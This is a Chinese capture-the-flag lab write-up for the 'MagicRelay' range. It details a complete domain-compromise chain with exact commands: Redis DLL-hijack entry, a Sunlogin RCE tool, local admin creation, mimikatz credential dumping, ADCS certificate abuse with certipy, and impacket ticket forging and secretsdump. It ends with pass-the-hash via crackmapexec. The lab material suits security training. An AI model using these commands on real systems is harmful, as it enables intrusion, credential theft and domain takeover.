春秋云镜-MagicRelay

admin 2025年5月22日00:50:13评论2 views字数 3264阅读10分52秒阅读模式

前言

刚结束最近的 HW,状态不佳,草草拿了个第二结束。结束后,抽出时间来写个漏洞扫描模块,其实在前面就已经写好了大纲,在刚结束的那场 HW 就用上了,但仍没打磨完善,不过也达到了我的预期效果,初衷是通过它来快速完成外网资产的端口扫描和指纹识别,不需要完成其他繁杂的任务,因此只要完成端口扫描--> 服务识别 --> web 指纹识别 --> 漏洞 POC/弱口令检测的链路即可。

flag01

正好看看春秋云镜的机器,完成一次全端口扫描的耗时

春秋云镜-MagicRelay
image-20250521170744489
春秋云镜-MagicRelay
image-20250521170808432
春秋云镜-MagicRelay
image-20250521170832441

耗时 144 秒,两分钟左右,在可以接受的范围,速度还可以通过调并发量来提高,不过在实战中,再快就很容易被封了。

看看扫描结果,主要是开了 3389 和 6379 端口的 redis 服务,并且是未授权春秋云镜-MagicRelay

但通过路径看到系统类型是 windows,因为没有相关 web 服务,排除了写文件的可能后,使用 dll 劫持,详细说明见先知的这篇文章:https://xz.aliyun.com/news/13892

按照文章生成对应的 dbghelp.dll 文件,使用 RABR 进行主从复制春秋云镜-MagicRelay

执行完后,vshell 就可以看到成功上线了春秋云镜-MagicRelay

顺利获取到第一个 flag春秋云镜-MagicRelay

这里翻文件的时候是看见有域环境的,先放着

flag02

传 fscan 到机器上执行内网扫描春秋云镜-MagicRelay

不得不说,2.0 的 fscan 相比 1.0 系列,结果显得有点乱,所以这里直接截图带过,总结一下扫描信息

172.22.12.25 我们的入口机器,redis未授权
172.22.12.6 DC机器
172.22.12.12 IIS服务,存在Active Directory 域权限提升漏洞
172.22.12.31 ftp存在匿名登录

连接 ftp春秋云镜-MagicRelay

有一个向日葵安装包,可能这台机器上安装了向日葵,对这台机器的高端口范围进行扫描 30000-50000春秋云镜-MagicRelay

并且是 system 权限春秋云镜-MagicRelay

这台机器不在域环境,而是工作组,直接读取 flag 就行

xrkRce.exe -t rce -h 172.22.12.31 -p 49687 -c "type C:UsersAdministratorflagflag02.txt"
春秋云镜-MagicRelay
image-20250521175250806

顺利拿到 flag 之后,没有其他突破点,继续回去看第一台机器,因为第一台机器前面是知道在域环境中的。

Flag04

因为第一台机器是 administrators 权限,我们添加用户 rdp

创建新用户dotast
net user dotast qwer1234! /add
将用户dotast添加至管理员组
net localgroup administrators dotast /add

通过微软的工具 PsExec.exe 提到 system 权限春秋云镜-MagicRelay

然后上传 mimikatz.exe 抓取机器用户哈希

mimikatz.exe "privilege::debug""sekurlsa::logonpasswords""exit"
春秋云镜-MagicRelay
image-20250521180604321
WIN-YUYAOX9Q$/e611213c6a712f9b18a8d056005a4f0f

这里为什么不收集域环境信息呢?因为前面入口机器就扫到了 ADCS,用脚想都知道准备考什么了,还是老内容。

惯例扫一下获取 ca 名称

Certify.exe find /vulnerable
春秋云镜-MagicRelay
image-20250521181753111

xiaorang-WIN-AUTHORITY-CA

配置hosts

172.22.12.6 WIN-SERVER.xiaorang.lab
172.22.12.12 WIN-AUTHORITY.xiaorang.lab

通过 certipy 创建一个机器账号 HACK1,并且设置 DNS Host Name 为域控的 WIN-SERVER.xiaorang.lab

proxychains certipy account create -u WIN-YUYAOX9Q$ -hashes e611213c6a712f9b18a8d056005a4f0f  -dc-ip 172.22.12.6 -user HACK1 -pass Qwer1234 -dns WIN-SERVER.xiaorang.lab -debug
春秋云镜-MagicRelay
image-20250521182646136

用该机器账户向 ca 请求证书

proxychains certipy req -u HACK1$@xiaorang.lab -p Qwer1234 -target 172.22.12.12 -ca "xiaorang-WIN-AUTHORITY-CA" -template Machine -debug -dc-ip 172.22.12.6

用申请到的证书进行 PKINIT Kerberos 身份认证,获取域控制器账号 TGT 票据

proxychains certipy auth -pfx win-server.pfx -dc-ip 172.22.12.6 -debug
春秋云镜-MagicRelay
image-20250521183202924

预料之内,情理之中,云镜靶场就没成功过一次。

先转换一下请求到的证书格式

certipy cert -pfx win-server.pfx > cert.pem

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

然后上传到入口机器上,通过证书认证到 LDAPS,添加机器账户 HACK2,并设置 HACK2 到域控制器 XR-DC01 的 WIN-SERVER

PassTheCertificate.exe -CertPath .cert.pfx -CertPassword 123456 -MachineAccount HACK2$ -MachinePassword Qwer1234 -Target "CN=WIN-SERVER,OU=Domain Controllers,DC=xiaorang,DC=lab"
春秋云镜-MagicRelay
image-20250521183714369

使用 impacket 的 getST.py 生成票据

proxychains impacket-getST xiaorang.lab/HACK2$:Qwer1234 -dc-ip 172.22.12.6 -spn cifs/WIN-SERVER.xiaorang.lab -impersonate Administrator
春秋云镜-MagicRelay
image-20250521183822274

然后使用生成的 Administrator.ccache 票据获取系统管理员权限

export KRB5CCNAME=Administrator.ccache
proxychains impacket-wmiexec WIN-SERVER.xiaorang.lab -no-pass -k -dc-ip 172.22.12.6
春秋云镜-MagicRelay
image-20250521183921418

获取 flag春秋云镜-MagicRelay

flag03

转储域管哈希

proxychains impacket-secretsdump 'xiaorang.lab/[email protected]' -target-ip 172.22.12.6 -no-pass -k
春秋云镜-MagicRelay
image-20250521184634063
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aa95e708a5182931157a526acf769b13:::

然后 pth 拿最后一台机器的 flag

proxychains crackmapexec smb 172.22.12.12 -u administrator -Haa95e708a5182931157a526acf769b13 -d xiaorang.lab -x "type UsersAdministratorflag03.txt"
春秋云镜-MagicRelay
image-20250521185134485

原文始发于微信公众号(虹猫少侠):春秋云镜-MagicRelay

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月22日00:50:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   春秋云镜-MagicRelayhttp://cn-sec.com/archives/4091522.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息